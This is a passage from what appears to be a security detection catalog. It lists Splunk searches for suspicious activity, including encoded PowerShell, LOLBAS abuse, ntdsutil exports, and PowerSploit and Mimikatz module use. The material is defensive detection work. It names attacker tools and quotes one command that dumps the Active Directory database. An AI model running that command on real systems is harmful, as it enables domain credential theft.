At this stage, there are no known false positives. During testing, no process events refering the com.apple.loginwindow.plist files were observed during normal operation of re-opening applications on reboot. Therefore, it can be asumed that any occurences of this in the process events would be worth investigating. In the event that the legitimate modification by the system of these files is in fact logged to the process log, then the process_name of that process can be added to an allow list.

Reference

Test Dataset

version: 1


Malicious powershell process - connect to internet with hidden window

This search looks for PowerShell processes started with parameters to modify the execution policy of the run, run in a hidden window, and connect to the Internet. This combination of command-line options is suspicious because it's overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Deprecated becaue hidden is not needed when download file with System.Net.WebClient.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2020-11-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe Processes.process=*-WindowStyle* Processes.process=*hidden* Processes.process="*New-Object*" by Processes.user Processes.process_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___connect_to_internet_with_hidden_window_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate process can have this combination of command-line options, but it's not common.

Reference

Test Dataset


version: 5


Malicious powershell process - encoded command

This search looks for PowerShell processes that have encoded the script within the command-line. Malware has been seen using this parameter, as it obfuscates the code and makes it relatively easy to pass a script on the command-line.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1027
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = powershell.exe (Processes.process=*-EncodedCommand* OR Processes.process=*-enc*) by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___encoded_command_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1027 Obfuscated Files or Information Defense Evasion


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

System administrators may use this option, but it's not common.

Reference

Test Dataset


version: 4


Malicious powershell process - execution policy bypass

This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` values(Processes.process_id) as process_id, values(Processes.parent_process_id) as parent_process_id values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe (Processes.process="* -ex*" OR Processes.process="* bypass *") by Processes.process_id, Processes.user, Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___execution_policy_bypass_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

There may be legitimate reasons to bypass the PowerShell execution policy. The PowerShell script being run with this parameter should be validated to ensure that it is legitimate.

Reference

Test Dataset


version: 4


Malicious powershell process with obfuscation techniques

This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2021-01-19

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval num_obfuscation = (mvcount(split(process,"`"))-1) + (mvcount(split(process, "^"))-1) + (mvcount(split(process, "'"))-1) | `malicious_powershell_process_with_obfuscation_techniques_filter` | search num_obfuscation > 10

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

These characters might be legitimately on the command-line, but it is not common.

Reference

Test Dataset


version: 4


Monitor registry keys for print monitors

This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1547.010
  • Last Updated: 2020-11-23

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.action=modified AND Registry.registry_path="*CurrentControlSet\\Control\\Print\\Monitors*" by Registry.dest, Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_name Registry.action | `drop_dm_object_name(Registry)` | `monitor_registry_keys_for_print_monitors_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report registry modifications.

Required field

ATT&CK

ID Technique Tactic
T1547.010 Port Monitors Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

You will encounter noise from legitimate print-monitor registry entries.

Reference

Test Dataset


version: 2


More than usual number of lolbas applications in short time period

Attacker activity may compromise executing several LOLBAS applications in conjunction to accomplish their objectives. We are looking for more than usual LOLBAS applications over a window of time, by building profiles per machine.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1059, T1053
  • Last Updated: 2020-08-25

Search

| from read_ssa_enriched_events() | eval device=ucast(map_get(input_event, "dest_device_id"), "string", null), process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | where process_name=="regsvcs.exe" OR process_name=="ftp.exe" OR process_name=="dfsvc.exe" OR process_name=="rasautou.exe" OR process_name=="schtasks.exe" OR process_name=="xwizard.exe" OR process_name=="findstr.exe" OR process_name=="esentutl.exe" OR process_name=="cscript.exe" OR process_name=="reg.exe" OR process_name=="csc.exe" OR process_name=="atbroker.exe" OR process_name=="print.exe" OR process_name=="pcwrun.exe" OR process_name=="vbc.exe" OR process_name=="rpcping.exe" OR process_name=="wsreset.exe" OR process_name=="ilasm.exe" OR process_name=="certutil.exe" OR process_name=="replace.exe" OR process_name=="mshta.exe" OR process_name=="bitsadmin.exe" OR process_name=="wscript.exe" OR process_name=="ieexec.exe" OR process_name=="cmd.exe" OR process_name=="microsoft.workflow.compiler.exe" OR process_name=="runscripthelper.exe" OR process_name=="makecab.exe" OR process_name=="forfiles.exe" OR process_name=="desktopimgdownldr.exe" OR process_name=="control.exe" OR process_name=="msbuild.exe" OR process_name=="register-cimprovider.exe" OR process_name=="tttracer.exe" OR process_name=="ie4uinit.exe" OR process_name=="sc.exe" OR process_name=="bash.exe" OR process_name=="hh.exe" OR process_name=="cmstp.exe" OR process_name=="mmc.exe" OR process_name=="jsc.exe" OR process_name=="scriptrunner.exe" OR process_name=="odbcconf.exe" OR process_name=="extexport.exe" OR process_name=="msdt.exe" OR process_name=="diskshadow.exe" OR process_name=="extrac32.exe" OR process_name=="eventvwr.exe" OR process_name=="mavinject.exe" OR process_name=="regasm.exe" OR process_name=="gpscript.exe" OR process_name=="rundll32.exe" OR process_name=="regsvr32.exe" OR process_name=="regedit.exe" OR process_name=="msiexec.exe" OR process_name=="gfxdownloadwrapper.exe" OR process_name=="presentationhost.exe" OR process_name=="regini.exe" OR process_name=="wmic.exe" OR process_name=="runonce.exe" OR process_name=="syncappvpublishingserver.exe" OR process_name=="verclsid.exe" OR process_name=="psr.exe" OR process_name=="infdefaultinstall.exe" OR process_name=="explorer.exe" OR process_name=="expand.exe" OR process_name=="installutil.exe" OR process_name=="netsh.exe" OR process_name=="wab.exe" OR process_name=="dnscmd.exe" OR process_name=="at.exe" OR process_name=="pcalua.exe" OR process_name=="cmdkey.exe" OR process_name=="msconfig.exe" | stats count(process_name) as lolbas_counter by device,span(timestamp, 300s) | eval lolbas_counter=lolbas_counter*1.0 | rename window_end as timestamp | adaptive_threshold algorithm="quantile" value="lolbas_counter" entity="device" window=2419200000L | where label AND quantile>0.99 | eval start_time = window_start, end_time = timestamp, entities = mvappend(device), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

Collect endpoint data such as sysmon or 4688 events.

Required field

  • dest_device_id
  • _time
  • process_name


ATT&CK

ID Technique Tactic
T1059 Command and Scripting Interpreter Execution
T1053 Scheduled Task/Job Execution, Persistence, Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

Some administrative tasks may involve multiple use of LOLBAS applications in a short period of time. This might trigger false positives at the beginning when it hasn't collected yet enough data to construct the baseline.


Reference


Test Dataset

version: 1


Nltest domain trust discovery

This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for Domain Trust information. Two arguments `/domain trusts`, returns a list of trusted domains, and `/all_trusts`, returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1482
  • Last Updated: 2021-01-25

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=nltest.exe OR Processes.process_name!=nltest.exe) (Processes.process=*/domain_trusts* OR Processes.process=*/all_trusts*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `nltest_domain_trust_discovery_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1482 Domain Trust Discovery Discovery


Kill Chain Phase

  • Exploitation


Known False Positives

Administrators may use nltest for troubleshooting purposes, otherwise, rarely used.

Reference


Test Dataset


version: 1


Ntdsutil export ntds

Monitor for signs that Ntdsutil is being used to Extract Active Directory database - NTDS.dit, typically used for offline password cracking. It may be used in normal circumstances with no command line arguments or shorthand variations of more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. Typical command used to dump ntds.dit \ ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q \ This technique uses "Install from Media" (IFM), which will extract a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit to the destination.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2021-01-28

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=ntdsutil.exe Processes.process=*ntds* Processes.process=*create*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ntdsutil_export_ntds_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Highly possible Server Administrators will troubleshoot with ntdsutil.exe, generating false positives.

Reference


Test Dataset


version: 1


Overwriting accessibility binaries

Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1546.008
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem where (Filesystem.file_path=*\\Windows\\System32\\sethc.exe* OR Filesystem.file_path=*\\Windows\\System32\\utilman.exe* OR Filesystem.file_path=*\\Windows\\System32\\osk.exe* OR Filesystem.file_path=*\\Windows\\System32\\Magnify.exe* OR Filesystem.file_path=*\\Windows\\System32\\Narrator.exe* OR Filesystem.file_path=*\\Windows\\System32\\DisplaySwitch.exe* OR Filesystem.file_path=*\\Windows\\System32\\AtBroker.exe*) by Filesystem.file_name Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `overwriting_accessibility_binaries_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1546.008 Accessibility Features Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Microsoft may provide updates to these binaries. Verify that these changes do not correspond with your normal software update cycle.

Reference

Test Dataset


version: 4


Probing access with stolen credentials via powersploit modules

This detection identifies use of PowerSploit modules that facilitate access probing with admin credentials as well as probing access to system services.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1098
  • Last Updated: 2020-11-04

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Test-AdminAccess/)=true OR match_regex(cmd_line, /(?i)Invoke-CheckLocalAdminAccess/)=true OR match_regex(cmd_line, /(?i)Test-ServiceDaclPermission/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_user_id
  • dest_device_id


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Process creating lnk file in suspicious location

This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1566.002
  • Last Updated: 2021-01-28

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.lnk" AND Filesystem.file_path="C:\\Temp*" by _time span=1h Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.file_hash Filesystem.user | `drop_dm_object_name(Filesystem)` | rename process_id as lnk_pid | join lnk_pid, _time [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=* by _time span=1h Processes.parent_process_id Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process | `drop_dm_object_name(Processes)` | rename parent_process_id as lnk_pid | fields _time lnk_pid process_id dest process_name process_path process] | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime, lastTime, lnk_pid, process_id, user, dest, file_name, file_path, process_name, process, process_path, file_hash | `process_creating_lnk_file_in_suspicious_location_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon.

Required field

ATT&CK

ID Technique Tactic
T1566.002 Spearphishing Link Initial Access


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

This detection should yield little or no false positive results. It is uncommon for LNK files to be executed from temporary or user directories.

Reference


Test Dataset


version: 4


Process execution via wmi

This search looks for processes launched via WMI.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1047
  • Last Updated: 2020-03-16

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name = *WmiPrvSE.exe by Processes.user Processes.dest Processes.process_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_execution_via_wmi_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1047 Windows Management Instrumentation Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, administrators may use wmi to execute commands for legitimate purposes.

Reference

Test Dataset


version: 3


Processes tapping keyboard events

This search looks for processes in an MacOS system that is tapping keyboard events in MacOS, and essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react on human input

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2019-01-25

Search

| from datamodel Alerts.Alerts | search app=osquery:results name=pack_osx-attacks_Keyboard_Event_Taps | rename columns.cmdline as cmd, columns.name as process_name, columns.pid as process_id | dedup host,process_name | table host,process_name, cmd, process_id | `processes_tapping_keyboard_events_filter`

Associated Analytic Story


How To Implement

In order to properly run this search, Splunk needs to ingest data from your osquery deployed agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. Also the [TA-OSquery](https://github.com/d1vious/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the osquery data populate the Alerts data model.

Required field

Kill Chain Phase

  • Command and Control


Known False Positives

There might be some false positives as keyboard event taps are used by processes like Siri and Zoom video chat, for some good examples of processes to exclude please see [this](https://github.com/facebook/osquery/pull/5345#issuecomment-454639161) comment.

Reference

Test Dataset

version: 1


Processes launching netsh

This search looks for processes launching netsh.exe. Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe and executing commands via the command line.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.004
  • Last Updated: 2020-07-10

Search

| tstats `security_content_summariesonly` count values(Processes.process) AS Processes.process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*netsh* by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.user Processes.dest |`drop_dm_object_name("Processes")` |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`processes_launching_netsh_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model

Required field

ATT&CK

ID Technique Tactic
T1562.004 Disable or Modify System Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Some VPN applications are known to launch netsh.exe. Outside of these instances, it is unusual for an executable to launch netsh.exe and run commands.

Reference

Test Dataset


version: 3


Rare parent-child process relationship

An attacker may use LOLBAS tools spawned from vulnerable applications not typically used by system administrators. This search leverages the Splunk Streaming ML DSP plugin to find rare parent/child relationships. The list of application has been extracted from https://github.com/LOLBAS-Project/LOLBAS/tree/master/yml/OSBinaries

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1203, T1059, T1053, T1072
  • Last Updated: 2020-08-13

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval parent_process=lower(ucast(map_get(input_event, "parent_process_name"), "string", null)), parent_process_name=mvindex(split(parent_process, "\\"), -1), process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null) | where parent_process_name!=null | select parent_process_name, process_name, timestamp, dest_device_id, dest_user_id | conditional_anomaly conditional="parent_process_name" target="process_name" | rename output as input | where input < 1 | adaptive_threshold algorithm="quantile" entity="parent_process_name" window=604800000L | where label AND quantile<0.1 AND (process_name="powershell.exe" OR process_name="regsvcs.exe" OR process_name="ftp.exe" OR process_name="dfsvc.exe" OR process_name="rasautou.exe" OR process_name="schtasks.exe" OR process_name="xwizard.exe" OR process_name="findstr.exe" OR process_name="esentutl.exe" OR process_name="cscript.exe" OR process_name="reg.exe" OR process_name="csc.exe" OR process_name="atbroker.exe" OR process_name="print.exe" OR process_name="pcwrun.exe" OR process_name="vbc.exe" OR process_name="rpcping.exe" OR process_name="wsreset.exe" OR process_name="ilasm.exe" OR process_name="certutil.exe" OR process_name="replace.exe" OR process_name="mshta.exe" OR process_name="bitsadmin.exe" OR process_name="wscript.exe" OR process_name="ieexec.exe" OR process_name="cmd.exe" OR process_name="microsoft.workflow.compiler.exe" OR process_name="runscripthelper.exe" OR process_name="makecab.exe" OR process_name="forfiles.exe" OR process_name="desktopimgdownldr.exe" OR process_name="control.exe" OR process_name="msbuild.exe" OR process_name="register-cimprovider.exe" OR process_name="tttracer.exe" OR process_name="ie4uinit.exe" OR process_name="sc.exe" OR process_name="bash.exe" OR process_name="hh.exe" OR process_name="cmstp.exe" OR process_name="mmc.exe" OR process_name="jsc.exe" OR process_name="scriptrunner.exe" OR process_name="odbcconf.exe" OR process_name="extexport.exe" OR process_name="msdt.exe" OR process_name="diskshadow.exe" OR process_name="extrac32.exe" OR process_name="eventvwr.exe" OR process_name="mavinject.exe" OR process_name="regasm.exe" OR process_name="gpscript.exe" OR process_name="rundll32.exe" OR process_name="regsvr32.exe" OR process_name="regedit.exe" OR process_name="msiexec.exe" OR process_name="gfxdownloadwrapper.exe" OR process_name="presentationhost.exe" OR process_name="regini.exe" OR process_name="wmic.exe" OR process_name="runonce.exe" OR process_name="syncappvpublishingserver.exe" OR process_name="verclsid.exe" OR process_name="psr.exe" OR process_name="infdefaultinstall.exe" OR process_name="explorer.exe" OR process_name="expand.exe" OR process_name="installutil.exe" OR process_name="netsh.exe" OR process_name="wab.exe" OR process_name="dnscmd.exe" OR process_name="at.exe" OR process_name="pcalua.exe" OR process_name="cmdkey.exe" OR process_name="msconfig.exe") | eval start_time = timestamp, end_time = timestamp, entities = mvappend(dest_device_id, dest_user_id), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

Collect endpoint data such as sysmon or 4688 events.

Required field

  • process_name
  • parent_process_name
  • _time
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1203 Exploitation for Client Execution Execution
T1059 Command and Scripting Interpreter Execution
T1053 Scheduled Task/Job Execution, Persistence, Privilege Escalation
T1072 Software Deployment Tools Execution, Lateral Movement


Kill Chain Phase

  • Exploitation


Known False Positives

Some custom tools used by admins could be used rarely to launch remotely applications. This might trigger false positives at the beginning when it hasn't collected yet enough data to construct the baseline.


Reference

Test Dataset

version: 1


Reconnaissance and access to accounts groups and policies via powersploit modules

This detection identifies access to PowerSploit modules that discover accounts, groups and policies that can be accessed or taken over.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1087, T1484
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-DomainLocalGroupMember/)=true OR match_regex(cmd_line, /(?i)Invoke-EnumerateLocalAdmin/)=true OR match_regex(cmd_line, /(?i)Find-DomainUserEvent/)=true OR match_regex(cmd_line, /(?i)Invoke-EventHunter/)=true OR match_regex(cmd_line, /(?i)Find-DomainUserLocation/)=true OR match_regex(cmd_line, /(?i)Invoke-UserHunter/)=true OR match_regex(cmd_line, /(?i)Get-DomainForeignGroupMember/)=true OR match_regex(cmd_line, /(?i)Find-ForeignGroup/)=true OR match_regex(cmd_line, /(?i)Get-DomainForeignUser/)=true OR match_regex(cmd_line, /(?i)Find-ForeignUser/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPO/)=true OR match_regex(cmd_line, /(?i)Get-NetGPO/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPOComputerLocalGroupMapping/)=true OR match_regex(cmd_line, /(?i)Find-GPOComputerAdmin/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPOLocalGroup/)=true OR match_regex(cmd_line, /(?i)Get-NetGPOGroup/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPOUserLocalGroupMapping/)=true OR match_regex(cmd_line, /(?i)Find-GPOLocation/)=true OR match_regex(cmd_line, /(?i)Get-DomainGroup/)=true OR match_regex(cmd_line, /(?i)Get-NetGroup/)=true OR match_regex(cmd_line, /(?i)Get-DomainGroupMember/)=true OR match_regex(cmd_line, /(?i)Get-NetGroupMember/)=true OR match_regex(cmd_line, /(?i)Get-DomainManagedSecurityGroup/)=true OR match_regex(cmd_line, /(?i)Find-ManagedSecurityGroups/)=true OR match_regex(cmd_line, /(?i)Get-DomainOU/)=true OR match_regex(cmd_line, /(?i)Get-NetOU/)=true OR match_regex(cmd_line, /(?i)Get-DomainUser/)=true OR match_regex(cmd_line, /(?i)Get-NetUser/)=true OR match_regex(cmd_line, /(?i)Get-DomainUserEvent/)=true OR match_regex(cmd_line, /(?i)Get-UserEvent/)=true OR match_regex(cmd_line, /(?i)Get-NetLocalGroup/)=true OR match_regex(cmd_line, /(?i)Get-NetLocalGroupMember/)=true OR match_regex(cmd_line, /(?i)Get-NetLoggedon/)=true OR match_regex(cmd_line, /(?i)Get-RegLoggedOn/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegLastLoggedOn/)=true OR match_regex(cmd_line, /(?i)Get-LastLoggedOn/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1087 Account Discovery Discovery
T1484 Domain Policy Modification Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to accounts and groups via mimikatz modules

This detection identifies use of Mimikatz modules for discovery of accounts and groups and access to them.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1087, T1484
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)net::user/)=true OR match_regex(cmd_line, /(?i)net::group/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1087 Account Discovery Discovery
T1484 Domain Policy Modification Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to active directoty infrastructure via powersploit modules

This detection identifies access to PowerSploit modules for reconnaissance and access to elements of Active Directory infrastructure, such as domain identifiers, AD sites and forests, and trust relations.

Search

